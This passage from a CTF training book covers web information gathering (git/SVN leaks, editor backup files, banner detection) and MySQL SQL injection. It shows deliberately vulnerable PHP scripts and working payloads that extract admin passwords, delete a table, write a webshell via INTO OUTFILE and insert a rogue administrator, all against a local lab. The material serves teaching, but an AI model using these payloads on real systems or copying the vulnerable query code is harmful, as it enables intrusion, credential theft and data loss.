Web challenges could be seen everywhere in traditional CTF competitions. They are easier to get started because they do not require in-depth knowledge of operating systems and complicated assembly instructions than PWN and Reverse challenges. On the other hand, they do not require strong programming skills compared to Crypto and MISC challenges.

This chapter will introduce some common Web vulnerabilities in CTF online competitions and provide readers with a relatively comprehensive concept of CTF online competitions by analyzing real-world examples. However, Web vulnerabilities classification is very complicated. It is better that readers could learn related knowledge on the Internet while reading this book to get the best effect.

Based on the frequency and complexity of the techniques to solve challenges, we divide the Web challenges into three levels: introductory, advanced, and extended. In this chapter, we will introduce the challenges of each group supplemented by real-world samples. Readers could understand how different vulnerabilities play a role in solving challenges, improving step by step, and becoming professional. This chapter starts from the “introductory” level to introduce the three most common techniques in solving Web challenges: Information Gathering, SQL Injection Attack, and Arbitrary File Read Attack.

1.1 Significant “Information Gathering”

1.1.1 The Importance of Information Gathering

As the old saying goes, “Knowledge precedes victory; Confusion precedes defeat.” Information gathering plays an essential role in BUG hunting. In the CTF online competition, information gathering covers a wide range of information, such as backup files, directory information, banner information, etc. To find vulnerabilities faster, BUG hunters need to be familiar with gathering that information and how the information will help. Fortunately, there are a large number of skillful open source scanning scripts available now. In this section, most information-gathering techniques, including useful open source tools or commercial software, will be mentioned.

1.1.2 Classification of Information Collection

In the following sub-sections, we will discuss the basic information gathering techniques from three aspects: Sensitive Directories Leakage, Sensitive Backup Files Leakage, and Banner Identification Leakage.

1.1.2.1 Sensitive Directory Leakage

Due to irregular operations, many hidden files with sensitive information will be left in the directory to be accessed remotely and anonymously. Attackers can use these files to obtain important information such as source codes and all file names in the guide.

  1. 1.

    Git leaks

【Vulnerability Introduction】 Git is a primary tributed coding version control system, and it will automatically generate a .git folder to save branch information. Developers often forget to delete the .git folder in the production environment, which allows an attacker to access all versions of source codes committed by developers. Attackers could be easier to find website vulnerabilities or get sensitive information such as usernames/passwords/emails.

  1. (1)

    Basic git leaks in CTF

Basic git leaks: This type of leakage requires a .git folder to have a comprehensive file structure, and all sensitive information could be found in the latest commit. CTF players should get the latest commit id in the .git/HEAD file and then use git’s algorithm to recover source code files that are restored in the .git/objects/ folder to perform the exploiting process. Now, many tools could automatically crawl these git objects from the .git folder and recover them. We strongly recommend a tool: https://github.com/denny0223/scrabble. It is easy to use:

. /scrabble http://example.com/

Build your Web environment locally (the current directory is /var/www/html/, which is the default Web directory of Apache). See Fig. 1.1.

Fig. 1.1
figure 1

Building process

Run the tool to get the source code and get the flag. See Fig. 1.2.

Fig. 1.2
figure 2

Get flag

  1. (2)

    Git rollback leakage

As a version control system, git keeps track of the commit changes. If a CTF challenge has a git leakage, the flag file may have been deleted or overwritten after several commits. The latest commit does not include any sensitive information. Fortunately, git has kept all commit versions in the .git folder. We can use the “git reset” command to roll back to another version. Building your environment locally, see Fig. 1.3.

Fig. 1.3
figure 3

Building process

To exploit this type of leakage, we first use the scrabble tool to crawl .git files, and then we can use the “git reset --hard HEAD^” command to roll back to the previous version. (Note: HEAD represents current/latest version in git system, the previous version could be marked as HEAD^), see Fig. 1.4.

Fig. 1.4
figure 4

Get flag

In addition to using “git reset”, a more straightforward way to see what files have been modified by each commit is to use the “git log –stat” command, and then use “git diff HEAD commit-id” command to compare the changes between the current version and other versions.

  1. (3)

    Git branch

After each commit, git will automatically put them into a timeline called the “branch”. Git allows multiple branches to separate their work from the main development branch, not affecting the main branch. If there is no new branch, there is only one branch default called the master branch. Under most conditions, git objects could be recovered from the master branch with ease. However, the flag or sensitive files we are looking for may not exist in the main branch. Using the “git log” command can only find the changes on the current branch, so we need to switch other branches to recover the target files.

Now, most of the tools that aim to exploit git leakage do not support switch branches. Manual efforts are required. Take GitHacker (https://github.com/WangYihang/GitHacker) as an example. The use of GitHacker is straightforward: Run the command “python GitHacker.py http://targethost:targetport/.git/”. After execution, all git files in the remote host are downloaded automatically into a local folder. After entering the folder and executing the “git log --all” or “git branch -v” command, only the master branch’s information is presented. Nonetheless, some checkout records could be found after executing the “git reflog” command, as shown in Fig. 1.5.

Fig. 1.5
figure 5

The results of commands.

As you can see, there is a secret branch in addition to the master branch, but the automation tool only restores the information from the master branch, so you need to manually download the head information from the secret branch and save it to .git/refs/heads/secret (execute the command “wget http://127.0.0.1:8000/.git/refs/heads/secret”). After recovering the head information, we can reuse part of GitHacker’s code to restore the branch automatically. As you can see in GitHacker’s code snap, it first downloads the git object files as many as possible, then uses “git fsck” to check them, and continue to download the missing files. Here you can reuse the fixmissing function that checks and restores the missing files. Let us delete the script that calls the main function, and modify the code to follow.

if __name__ == "__main__": # main() baseurl = complete_url('http://127.0.0.1:8000/.git/') temppath = repalce_bad_chars(get_prefix(baseurl)) fixmissing(baseurl, temppath)

After making the changes, re-execute the “python GitHacker.py” command, re-enter the generated folder, and run the “git log --all” or “branch -v” command, the secret branch information can be restored, find the corresponding commit hash in the git log, execute the “git diff HEAD b94c” command, and then run “git diff HEAD b94c”. A flag is captured! See Fig. 1.6.

Fig. 1.6
figure 6

Get flag

  1. (4)

    Other exploits of git leaks

In addition to the common exploit of recovering source code, other useful messages could be detected. For example, the .git/ config folder may contain access_token information that allows access to the user's other repositories.

  1. 2.

    SVN leakage

SVN (subversion) is another source code version controlling software. The administrator might expose the hidden project folder of SVN to public services (usually webserver). Hackers could download the .svn/entries file or the wc.db file to obtain the server source code and other information. Two excellent exploiting scripts: dvcs-ripper (https://github.com/kost/dvcs-ripper) and Seay-svn (Windows source code backup exploit).

  1. 3.

    HG leakage

When you initialize your project, HG creates a hidden folder of .hg in the current folder, containing code snaps or branch changelogs. Here is the exploiting script: dvcs-ripper (https://github.com/kost/dvcs-ripper).

  1. 4.

    Personal experience

Readers can perform secondary development based on existed tools to meet their own needs. Whether it is a hidden folder like .git or sensitive backend folders like the website management platform, a robust directory (common sensitive files/folders list) is a key to finding them. An open-source web directory scanning script: dirsearch (https://github.com/maurosoria/dirsearch), including a default directory.

If you got the 403 HTTP response code in a CTF challenge when accessing the .git folder, the following action should be accessing the .git/HEAD or the .git/config file. If the corresponding content of the file is shown, it means that there is a git leakage. When exploiting the SVN leakage, source codes or sensitive files are usually crawled from the entries directory, but sometimes the entries directory is empty. If so, pay attention to whether the wc.db file exists or not, and you can get the sensitive files in the pristine folder through the checksum in the wc.db.

1.1.2.2 Sensitive Backup Files

With some sensitive backup files, we can get the source code of a file or the whole sitemap.

  1. 1.

    gedit backup file

Under Linux, after saving with a gedit editor, a file with the suffix “~” will be created in the current directory, the contents of which will be the content of the file you just edited. If the file you just saved is named flag, then the file is named flag~, see Fig. 1.7.

Fig. 1.7
figure 7

Get source

  1. 2.

    vim backup file

vim is currently the most widely used Linux text editor. When a user is editing a file and exits abnormally. (e.g., when connecting to the server via SSH, the user may encounter a command-line jam while editing a file with vim due to insufficient network speed), a backup file is generated in the current directory with the following filename format.

.filename.swp

This file is used to back up the contents of the buffer, i.e., the file's contents on exit, as shown in Fig. 1.8.

Fig. 1.8
figure 8

Result

For SWP backup files, we can use the “vim -r” command to restore the file’s contents. To create a test demo case, execute the “vim flag” command first and then close the terminal directly. A .flag.swp file will be generated in the current directory. To recover the SWP backup file, first create a flag file in the current directory, then use the command “vim -r flag”, you can get the contents of the file that was edited when you exited unexpectedly. See Fig. 1.9.

Fig. 1.9
figure 9

Get flag

  1. 3.

    Common files

Some common files could leak sensitive messages, and these files are summarized by experts and listed in directory files of scanning scripts. Here are some examples.

  • robots.txt: records some directory and CMS version information.

  • readme.md: Records CMS version information, some even have a Github address.

  • www.zip/rar/tar.gz: often the source codes of a website.

  1. 4.

    Personal experience

Some challenge maintainers modify their challenge files online during CTF online competitions, and SWP backup files are generated due to vim’s feature. Thus players could unintentionally get source codes or sensitive messages.

The backup file generated by vim on the first abnormally exit is format as *. swp, the second exit could get *. swo, *. swn would be generated on the third exit. The official vim manual also contains backup files with name format as *.un.filename.swp

In addition, in a real-world environment, the backup of a website may often be a zip file named as the domain name (google.zip) or date (2021-7-1.zip).

1.1.2.3 Banner Identification

In the CTF online competition, the website's banner information (some basic fingerprints information) plays a significant role in solving challenges, and the players can often get the solutions from the banner information. For example, if we know that the site is a windows server, we can exploit the upload vulnerability in particular ways according to the features of windows. Here are the two most common ways to identify banners.

  1. 1.

    collect your fingerprint database

There are several publicly available CMS fingerprints on GitHub that readers can find for themselves and some well-known web scanners to identify websites.

  1. 2.

    Use existing tools

We can make use of the python-Wappalyzer, which is a Python library. The demo code is listed below.

$ pip install python-Wappalyzer >>> from Wappalyzer import Wappalyzer, WebPage >>> wappalyzer = Wappalyzer.latest() >>> webpage = WebPage.new_from_url('http://example.com') >>> wappalyzer.analyze(webpage) set([u'EdgeCast'])

The apps.json file includes rules in the data directory, and readers can modify it according to their needs.

  1. 3.

    Personal experience

When performing banner information detection on the server, we can also try to enter some URLs at will, and sometimes we can find some information through the 404 error pages and 302 redirection pages. For example, the ThinkPHP (a kind of web application) server with the debug option turned on will display the ThinkPHP version on error pages.

1.2 SQL Injection in CTF

During the development process of web applications, many developers use databases for data storage to quickly update the contents. Due to the lack of strict filtering of the user input, the attacker could inject the possible attack payloads into SQL query statements and then pass these query statements to the back-end database for execution, resulting in a situation where the actual statements were executed inconsistently. This attack is known as an SQL injection attack.

Most applications put data such as passwords into the database. SQL injection attacks can leak sensitive information in the system, making it an entry-level vulnerability into the Web system. Thus, most CTF competitions take SQL injection as a challenging point, and SQL injection vulnerability is one of the most common vulnerabilities in real-world applications.

This chapter describes the principles, exploits, defenses, and bypass methods of SQL injection. Given the space limit and the similarity of the principles of SQL injection, only the most frequently exploited injection attacks against MySQL databases during the competitions are covered, no more details about Access, Microsoft SQL Server, NoSQL, etc. The reader needs to have some basic knowledge of SQL and PHP to read this chapter.

1.2.1 SQL Injection Basics

SQL injection is a technique in which developers do not strictly filter the user input, which causes the user input to affect the query function, and finally causes the original information of the database to be leaked, modified, or even deleted. This section uses simple examples to introduce SQL injection basics in detail, including digital SQL injection, UNION SQL injection, character SQL injection, Boolean-blind-based SQL injection, time-based SQL injection, error-based SQL injection, stack SQL injection, and other injection types corresponding exploiting techniques.

【Test Environment】 Ubuntu 16.04 (IP address: 192.168.20.133), Apache, MySQL 5.7, PHP 7.2.

1.2.1.1 Numeric SQL Injection and UNION SQL Injection

The PHP code snap for the first example (sql1.php) is shown below (see comments for code introduction).

sql1.php <?php // Connect to local MySQL with a test database. $conn = mysqli_connect("127.0.0.1","root","root","test"); // Query the title and content fields of wp_news table, id is the user input value. $res = mysqli_query($conn,"SELECT title, content FROM wp_news WHERE id=".$_GET['id']); // Description: The code and commands are not case sensitive for SQL statements, the keywords are uppercase here for clarity. // Converts the query results to an array. $row = mysqli_fetch_array($res); echo "<center>"; // Output the value of the title field in the results. echo "<h1>". $row['title']."</h1>"; echo "<br>"; // Output the value of the content field in the result. echo "<h1>". $row['content']."</h1>"; echo "</center>"; ?>

The table structure of the database is shown in Fig. 1.10. The contents of the news table wp_news are shown in Fig. 1.11. The contents of the user table wp_user are shown in Fig. 1.12.

Fig. 1.10
figure 10

Tables

Fig. 1.11
figure 11

Contents of table wp_news

Fig. 1.12
figure 12

Contents of table wp_ user

The goal of this section is to turn the news table query into a query for the admin table(usually the administrator) 's columns account and password (the password is usually a hash value, but here it is rendered in plaintext this_is_the_admin_password for the demonstration) by changing the id value entered in HTTP's GET method. The admin’s account and password are the essential credentials of a web system, which allows an attacker to log in to the backend system and control the entire web system.

The results are shown in Fig. 1.13.

Fig. 1.13
figure 13

Result

The page displays the same results as the first row of id=1 in the news table wp_news in Fig. 1.11. PHP has injected the id=1 passed by the GET method with the previous SQL query statement. The original query statement is as follows.

$res = mysqli_query($conn, "SELECT title, content FROM wp_news WHERE id=". $_GET['id']);

A request is received from http://192.168.20.133/sql1.php?id=1, $_GET['id'] is assigned a value of 1. The final query statement passed to MySQL is as follows.

SELECT title, content FROM wp_news WHERE id = 1

We can get the same result by querying directly in MySQL, see Fig. 1.14.

Fig. 1.14
figure 14

Result

The contents of most websites on the Internet today are stored in databases, and the corresponding records are queried from the database through parameters such as the user’s incoming id and then displayed in the browser, such as “2” in http://192.168.20.133/sql1.php?id=2. The result is in Fig. 1.15.

Fig. 1.15
figure 15

Result

The following procedure demonstrates a SQL injection attack using the id parameter entered by the user.

Visiting the link http://192.168.20.133/sql1.php?id=2, Fig. 1.16 shows the record with id=2 in Fig. 1.11, then visiting the link http://192.168.20.133/sql1.php?id=3-1, the page still shows the record with id=2. See Fig. 1.17. This phenomenon means MySQL computes the “3-1” expression and gets 2, then queries the record with id=2.

Fig. 1.16
figure 16

Normal query

Fig. 1.17
figure 17

Result

From the behavior of the number computing, we can tell that the injection point is a numeric SQL injection, as shown by the lack of quotation marks around the input point “$_GET[‘id’]” (also evidenced by the source code), and we can then enter a SQL sub-query directly to pollute the original query (see Fig. 1.18 for results).

SELECT title, content FROM wp_news WHERE id = 1 UNION SELECT user, pwd FROM wp_user

Fig. 1.18
figure 18

Result

The purpose of this SQL statement is to query the data in the title and content fields of the corresponding rows of the news table when id=1 and to jointly query all the contents of the user and pwd (i.e., the account password fields) in the user table.

When accessing the web application, we should only enter the content after the id to access the link: http://192.168.20.133/sql1.php?id=1 union select user,pwd from wp_user. The result is shown in Fig. 1.19, where the “%20” is the URL encoding result of the space. The browser automatically URL-encodes the special characters in the URI, and the server automatically decodes the URL when it receives the request.

Fig. 1.19
figure 19

Result

However, Fig. 1.19 does not display the contents of the user and password as expected. MySQL does query out two rows, but the PHP code dictates that only one row be displayed on the page, so we need to control the user and password result on the first row of the query result. There are several ways to do this, such as continuing to inject the “limit 1,1” to the original query (which displays the second row of the query result, see Fig. 1.20). The “limit 1,1” is a qualification that takes a one-row record from the second row. In another example, we could specify id=-1 or a huge value so that the first row in Fig. 1.18 cannot be queried (see Fig. 1.21), which results in only one row (see Fig. 1.22).

Fig. 1.20
figure 20

Result

Fig. 1.21
figure 21

Result

Fig. 1.22
figure 22

Result

Usually, the method shown in Fig. 1.22 is used to control result rows. Accessing http://192.168.20.133/sql1.php?id=-1 union select user, pwd from wp_user, and the result is shown in Fig. 1.23.

Fig. 1.23
figure 23

Result

The injection approach to presenting data to a page using the UNION statement is commonly referred to as UNION (union query) injection.

Since we already know the database structure in the example we just gave, how do we know the field name pwd and the table name wp_user in blind pentesting?

After MySQL 5.0 version, it comes with a database information_schema by default, from which all database names, table names, and field names of MySQL can be queried. Although the introduction of this database facilitates the query of database information, it objectively greatly facilitates the exploitation of SQL injection.

Let us start with a real injection case. Assuming that we do not know anything about the target database, the first thing we should do is determining if there is a numerical injection by the same page result of id=3-1 and id=2 (i.e., Fig. 1.16 is consistent with Fig. 1.17), and then we use a union query to find all the other table names in the database. The corresponding injection process is visiting URL as http://192.168.20.133/sql1.php?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database(), the results are shown in Fig. 1.24.

Fig. 1.24
figure 24

Result

The table_name column represents the table name of tables recorded in information_schema. There is also a database name column referred to as table_schema in information_schema. The result returned by the database() function is the current selected database’s name, and the group_concat() is a function that uses “,” to combine multiple rows of records. In other words, this statement can jointly query all (in fact, a specific length limit) table names in the current database and combine them in one cell. The consistency of the results in Figs. 1.24 and 1.25 also proves the validity of the sentence. In this way, you can get one of the existing tables named wp_user.

Fig. 1.25
figure 25

Get the table

Similarly, the columns table and its field name column_name could help query all column name of wp_user table. Access http://192.168.20.133/sql1.php?id=-1 union select 1, group_concat(column_name) from information _schema.columns where table_name = ‘wp_user’, you can get the corresponding column name, see Fig. 1.26.

Fig. 1.26
figure 26

Get the column

At this point, the first example is over. The key to digital SQL injection is to find the user input point. Then through addition, subtraction, multiplication, division, etc., it could be judged that if there are quotation marks wrapped around the input parameter in a SQL query, some general attack methods could be exploited to obtain sensitive information in the database.

1.2.1.2 Character SQL Injection and Boolean Blinds SQL Injection

The following is a simple modification of the source code of sql1.php to sql2.php, as shown below.

sql2.php <?php $conn = mysqli_connect("127.0.0.1", "root", "root", "test"); $res = mysqli_query($conn, "SELECT title, content FROM wp_news WHERE id = '".$_GET['id']."'"); $row = mysqli_fetch_array($res); echo "<center>"; echo "<h1>".$row['title']."</h1>"; echo "<br>"; echo "<h1>".$row['content']."</h1>"; echo "</center>"; ?>

Compared to sql1.php, it wraps single quotes around the GET parameter input, making it a string to query in MySQL.

SELECT title, content FROM wp_news WHERE id = '1';

The results are shown in Fig. 1.27.

Fig. 1.27
figure 27

Result

In MySQL, if the data types on both sides of the equal sign expression are inconsistent, forced type conversion will occur. When the number is compared with the string data, the string will be converted to a number and then compared, as shown in Fig. 1.28. The string 1 is equal to a number; the string 1a is forcibly converted to 1, equal to 1; the string a is forcibly converted to 0, so it is equal to 0.

Fig. 1.28
figure 28

Result

Following this feature, it is easy to determine whether the input point is character-based, i.e., whether it is wrapped in quotation marks (either single or double quotation marks, in most cases single quotation marks).

Visit http://192.168.20.133/sql2.php?id=3-2, and the result can be seen in Fig. 1.29. The page is empty, so we could guess it is not a number type injection but probably a character type injection. Continue trying to access http://192.168.20.133/sql2.php?id=2a, and the result could be seen in Fig. 1.30, indicating that it is indeed a character-type injection.

Fig. 1.29
figure 29

Not a number type injection

Fig. 1.30
figure 30

Character-type injection

Try using single quotes to close the previous single quotes, and then comment the rest of the statement with “--%20” or “%23”. Note that the input must be URL encoded, with “%20” for spaces and “%23” for “#”.

Visit http://192.168.20.133/sql2.php?id=2%27%23, and the results are shown in Fig. 1.31.

Fig. 1.31.
figure 31

Result

The contents are successfully displayed, and the MySQL statement is now as follows.

SELECT title, content FROM wp_news WHERE id = '2'#'

The single quotation mark entered closes the previous single quotation mark, and the “#” entered comments the original query's single quotation mark. The query is executed successfully, and the next steps are consistent with the numeric injection in Sect. 1.2.1.1,and the results are shown in Fig. 1.32.

Fig. 1.32
figure 32

Result

Of course, in addition to comments, you can also use single quotation marks to close the original query’s quotation mark, see Fig. 1.33.

Fig. 1.33
figure 33

Use single quotation marks to close the original query’s quotation mark

Visit http://192.168.20.133/sql2.php?id=1' and '1, and the database query statement is shown in Fig. 1.34.

Fig. 1.34
figure 34

Result

The statements after the keyword “WHERE” represent the condition of the SELECT operation. Take the previous case as an example, “id=1” is the query condition. Here, the keyword “AND” stands for two conditions that should be met, (1)id=1 ;(2)‘1’==true. The second condition will always be met since the string ‘1’ is converted to 1(which equals true). The database only needs to query for the row with id=1.

Look again at the statement shown in Fig. 1.35: the first condition is still id=1, and the second condition string ‘a’ is forced to be converted to a logical false, so the condition is not satisfied and the query result is empty. When the page is displayed as usual, it could prove that condition after AND is true, and when the page is displayed as empty, the condition after AND is false. Although we do not see the data directly, we can infer the data by injection, a technique known as Boolean-blind-type SQL injection.

Fig. 1.35
figure 35

Result

Here are the technical details about blind-bool-type SQL injection. For example, if the sensitive data has only one byte, first try to see if the data is ‘a’. If it is, then the page will display as “id=1”(first condition). Otherwise, the page will be blank. If the character being guessed is ‘f’, go to http://192.168.20.133/sql2.php?id=1' and sensitive_data=‘a’, guess ‘a’, and fail to guess, try ‘b’, ‘c’, ‘d’, ‘e’, and fail to guess, until you try ‘f’, you win, and the page displays as “id=1”. See the result in Fig. 1.36.

Fig. 1.36
figure 36

Result

Of course, this guessing process above is too slow. We can change the symbol and use “<” to guess characters by range. Go to the link http://192.168.20.133/sql2.php?id=1' and sensitive_data < ‘n’ to quickly know that the character's ASCII code is being guessed is less than the ASCII code of character ‘n’, and then use the dichotomy search algorithm to continue guessing the sensitive character.

The above case is only in a single-character condition, but in reality, most of the data in the database is not a single character, so how do we get every byte of data in this case? The answer is to use MySQL’s own functions for data interception, such as substring(), mid(), and substr(), see Fig. 1.37.

Fig. 1.37
figure 37

Result

The principle of Boolean-blind-type SQL injection has been briefly described above, so let us use it to get the password for admin. Query in MySQL (see Fig. 1.38 for results).

SELECT concat(user, 0x7e, pwd) FROM wp_user

Fig. 1.38
figure 38

Result

Then intercept the first byte of the data (see Fig. 1.39 for results).

SELECT MID((SELECT concat(user, 0x7e, pwd) FROM wp_user), 1, 1)

Fig. 1.39
figure 39

Result

So the complete exploit SQL query is as follows.

SELECT title, content FROM wp_news WHERE id = '1' AND (SELECT MID((SELECT concat(user, 0x7e, pwd) FROM wp_user), 1, 1)) = 'a'

Go to visit http://192.168.20.133/sql2.php?id=1' and(select mid((select concat(user,0x7e,pwd) from wp_user),1,1)) = ‘a’%23 and the result is shown in Fig. 1.40. To intercept the second byte, accessing http://192.168.20.133/sql2.php?id=1' and(select mid((select concat(user,0x7e,pwd) from wp_user),2,1))=‘d’%23, the result is consistent with Fig. 1.40, which shows that the second position character is 'd'. And base on this method, we could get the other bytes.

Fig. 1.40
figure 40

Result

Blind-type SQL injection, it is common to get sensitive data through the different contents of the page responses. In some cases, the page responses are static, so it is necessary to determine the result of SQL injection in other ways, such as the time delay, which can be seen in Fig. 1.41. By modifying the parameters of the function sleep(), we can make the delay longer to ensure that the delay is caused by the injection and not by normal query processing. Unlike the instant results of the Blind-type SQL injection, the sleep() function takes advantage of the short-circuit characteristics of the IF statement or the AND/OR keywords and the time of SQL query execution to determine the result of the SQL injection attack, which is known as a Time-blind-type injection. Its attacking structure is similar to the Boolean-blind-type, so no more specific examples to be needed here.

Fig. 1.41
figure 41

Result

1.2.1.3 Error-Type SQL Injection

Sometimes, in order to facilitate debugging by developers, some websites will enable error debugging messages, the demo codesnap is shown in sql3.php.

sql3.php <?php $conn = mysqli_connect("127.0.0.1", "root", "root", "test"); $res = mysqli_query($conn, "SELECT title, content FROM wp_news WHERE id = '".$_GET['id']."'") OR VAR_DUMP(mysqli_error($conn)); //Display the error $row = mysqli_fetch_array($res); echo "<center>"; echo "<h1>".$row['title']."</h1>"; echo "<br>"; echo "<h1>".$row['content']."</h1>"; echo "</center>"; ?>

This attacking type is called an Error-type SQL injection because MySQL presents the error message after execution, as shown in Fig. 1.42.

Fig. 1.42
figure 42

Result

As you can see from the documentation, the second parameter of the updatexml() function should be a legal XPATH path when it is executed. Otherwise, it will output the incoming parameter while raising an error, as shown in Fig. 1.43.

Fig. 1.43
figure 43

Result

Using this feature, for an example of errors display, pass the sensitive information we want to the second parameter of the updatexml function. Try to access the link http://192.168.20.133/sql3.php?id=1' or updatexml(1, concat(0x7e,(select pwd from wp_user)),1)%23, the result is shown in Fig. 1.44.

Fig. 1.44
figure 44

Result

In addition, when the target server enables multiple statement execution, arbitrary database data can be modified using multiple statement execution. This type of injection environment is called stacked SQL injection.

The source code snap is shown in sql4.php.

sql4.php <?php $db = new PDO("mysql:host=localhost:3306;dbname=test", 'root', 'root'); $sql = "SELECT title, content FROM wp_news WHERE id='". $_GET['id']."'" ; try { foreach($db->query($sql) as $row) { print_r($row); } } catch(PDOException $e) { echo $e->getMessage(); die(); } ?>

In this situation, you can execute any SQL statement after closing the single quotes, such as trying to access http://192.168.20.133/sql4.php?id=1 %27;delete%20%20from%20wp_files;%23 in a browser. The result could be seen in Fig. 1.45. This action has deleted all data of table wp_files.

Fig. 1.45
figure 45

Result

This section introduces numerical-type SQL injection, UNION injection, Boolean blind injection, Time blind injection, and Error-type injection as the basis for advanced SQL injections. These injection techniques are prioritized for ease of data leakage: UNION injection > Error-type injection > Boolean blinding injection > Time blinding injection.

Stacked injections are out of the scope of sorting, as they often need to be used in combination with other techniques to obtain data.

1.2.2 Injection Points

This section will discuss SQL injection techniques from the syntax of SQL statements at different injection point locations.

1.2.2.1 SELECT Injection

The SELECT statement is used to query data records and is often used to display an interface, such as the content of news, etc. The syntax of the SELECT statement is as follows.

SELECT [ALL | DISTINCT | DISTINCTROW ] [HIGH_PRIORITY] [STRAIGHT_JOIN] [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT] [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] select_expr[, select_expr …] [FROM table_references [PARTITION partition_list] [WHERE where_condition] [GROUP BY {col_name | expr | position} [ASC | DESC], … [WITH ROLLUP]] [HAVING where_condition] [ORDER BY {col_name | expr | position} [ASC | DESC], …] [LIMIT {[offset,] row_count | row_count OFFSET offset}] [PROCEDURE procedure_name(argument_list)] [INTO OUTFILE 'file_name' [CHARACTER SET charset_name] export_options | INTO DUMPFILE 'file_name' | INTO var_name [, var_name]] [FOR UPDATE | LOCK IN SHARE MODE]]

  1. 1.

    injection point at select_expr

The source code is shown in sqln1.php.

sqln1.php <?php $conn = mysqli_connect("127.0.0.1", "root", "root", "test"); $res = mysqli_query($conn, "SELECT ${_GET['id']}, content FROM wp_news"); $row = mysqli_fetch_array($res); echo "<center>"; echo "<h1>".$row['title']."</h1>"; echo "<br>"; echo "<h1>".$row['content']."</h1>"; echo "</center>"; ?>

In this situation, you can take the time-blind-type injection method from Sect. 1.2.1.2 to fetch the sensitive data, but according to MySQL syntax, we have a better way to display the query results directly into the interface by using the AS alias keyword. Access the link http://192.168.20.133/sqln1.php?id=(select%20pwd%20from%20wp_user)%20as%20title, see Fig. 1.46.

Fig. 1.46
figure 46

Result

  1. 2.

    injection point at table_reference

Replace the SQL query statement above with the following.

$res = mysqli_query($conn, "SELECT title FROM ${_GET['table']}");

We can still retrieve the data directly using aliases, such as

SELECT title FROM (SELECT pwd AS title FROM wp_user)x;

Of course, if you do not know the exact table name, you can fetch table names from the information_schema.tables table first.

For select_expr and table_reference injection points, the quotes need to be closed first if the user input is wrapped in quotes. Readers could test the specific statements locally.

  1. 3.

    The injection point is after WHERE or HAVING.

The SQL query statement is as follows.

$res = mysqli_query($conn, "SELECT title FROM wp_news WHERE id = ${_GET[id]}");

This situation has already been discussed in Sect. 1.2.1, Injection Basics, and is the most common situation encountered in real-world applications.

The situation is similar for the injection point after HAVING.

  1. 4.

    The injection point is after the GROUP BY or ORDER BY.

When you encounter an injection point that is not after WHERE, try it in your local MySQL environment to see what you can add after the statement to determine where the injection point is, and then do the injection accordingly. Assume the following code.

$res = mysqli_query($conn, "SELECT title FROM wp_news GROUP BY ${_GET['title']}");

After testing, it was found that title=id desc,(if(1,sleep(1),1)) makes the response 1-second delay, so you can use the time injection method to get the sensitive data.

This section’s cases still widely exist even after most developers have become security-conscious, mainly because developers cannot use pre-compiled methods to handle such parameters when writing system frameworks. It is possible to defend against such injections by simply whitelisting the input values.

  1. 5.

    The injection point is after LIMIT.

By changing the limit number, the page will show more or fewer records. Due to the syntax limitation, the previous character injection method is not suitable (only numbers can be injected after LIMIT). Alternatively, we can try injecting by using the PROCEDURE keyword based on the SELECT syntax, which is only available for versions of MySQL before 5.6, see Fig. 1.47.

Fig. 1.47
figure 47

Result

It is also possible to inject based on time, as follows.

PROCEDURE analyse((SELECT extractvalue(1, concat(0x3a, (IF(MID(VERSION(), 1, 1) LIKE 5, BENCHMARK(5000000, SHA1(1)), 1))))), 1)

The processing time for the BENCHMARK statement is about 1 second. We can also use the INTO OUTFILE keyword to write a webshell in the web directory under certain circumstances where we have the write permission. The query is SELECT xx INTO outfile "/tmp/xxx.php" LINES TERMINATED BY '<?php phpinfo();?>', see Fig. 1.48.

Fig. 1.48
figure 48

Result

1.2.2.2 INSERT Statement Injection

The INSERT statement is one type that inserts records into a table and usually is used in web design where news is added, users sign up, and comments to articles, etc. The syntax of the INSERT statement is as follows.

INSERT [LOW_PRIORITY | DELAYED | HIGH_PRIORITY] [IGNORE] [INTO] tbl_name [PARTITION (partition_name [, partition_name] ...)] [(col_name [, col_name] ...)] {VALUES | VALUE} (value_list) [, (value_list)] ... [ON DUPLICATE KEY UPDATE assignment_list] INSERT [LOW_PRIORITY | DELAYED | HIGH_PRIORITY] [IGNORE] [INTO] tbl_name [PARTITION (partition_name [, partition_name] ...)] SET assignment_list [ON DUPLICATE KEY UPDATE assignment_list]= INSERT [LOW_PRIORITY | HIGH_PRIORITY] [IGNORE] [INTO] tbl_name [PARTITION (partition_name [, partition_name] ...)] [(col_name [, col_name] ...)] SELECT ... [ON DUPLICATE KEY UPDATE assignment_list]

Usually, the injection point is located in the field name or field value, and there is no response message after the execution of the INSERT statement.

  1. 1.

    The injection point is located at tbl_name

If you can comment on subsequent statements with an annotation character, you can insert specific data directly into the desired table, such as the administrator table, for example, for the following SQL statement.

$res = mysqli_query($conn, "INSERT INTO {$_GET['table']} VALUES(2,2,2,2)");

The developer expects to control the table’s value as wp_news to insert records into the news table. Since we can control the table name, we can access http://192.168.20.132/insert.php?table=wp_user values(2,‘newadmin’,‘newpass’)%23 and see Fig. 1.49 for the wp_user table before and after accessing the contents. A new administrator record was inserted in the table.

Fig. 1.49
figure 49

Result

  1. 2.

    The injection point is located in VALUES.

Assume the following SQL statement.

INSERT INTO wp_user VALUES(1, 1, 'controllable location');

You can close the single quote and then insert another record. Usually, the administrator and the regular user are in the same table. The injection statement is as follows.

INSERT INTO wp_user VALUES(1, 0, '1'), (2, 1, 'aaaa');

An administrator user can be inserted if the second field of the user table represents the administrator privilege flag. In some cases, we can also insert data into a field that can be displayed back to the user to get the data quickly. Assuming that the data from the last field will be displayed on the page, the first user's password can be injected using the following statement.

INSERT INTO wp_user VALUES(1, 1, '1'), (2, 2, (SELECT pwd FROM wp_user LIMIT 1));

1.2.2.3 UPDATE Injection

The UPDATE statement is used for updating database records, such as users modifying their articles, personal information, etc. The syntax of the UPDATE statement is as follows.

UPDATE [LOW_PRIORITY] [IGNORE] table_reference SET assignment_list [WHERE where_condition] [ORDER BY ...] [LIMIT row_count] value: {expr | DEFAULT} assignment: col_name = value assignment_list: assignment [, assignment] ...

For example, let us take an example where the injection point is after SET. A normal update statement is shown in Fig. 1.50, and you can see that the id-data in line 2 of the original wp_user table has been modified.

Fig. 1.50
figure 50

Result

When the id-data is controllable, it is possible to modify multiple fields of data, as follows

UPDATE wp_user SET id=3, user='xxx' WHERE user = '23';

The methods to exploit the rest of the injection points are similar to injection methods of SELECT statements.

1.2.2.4 DELETE Injection

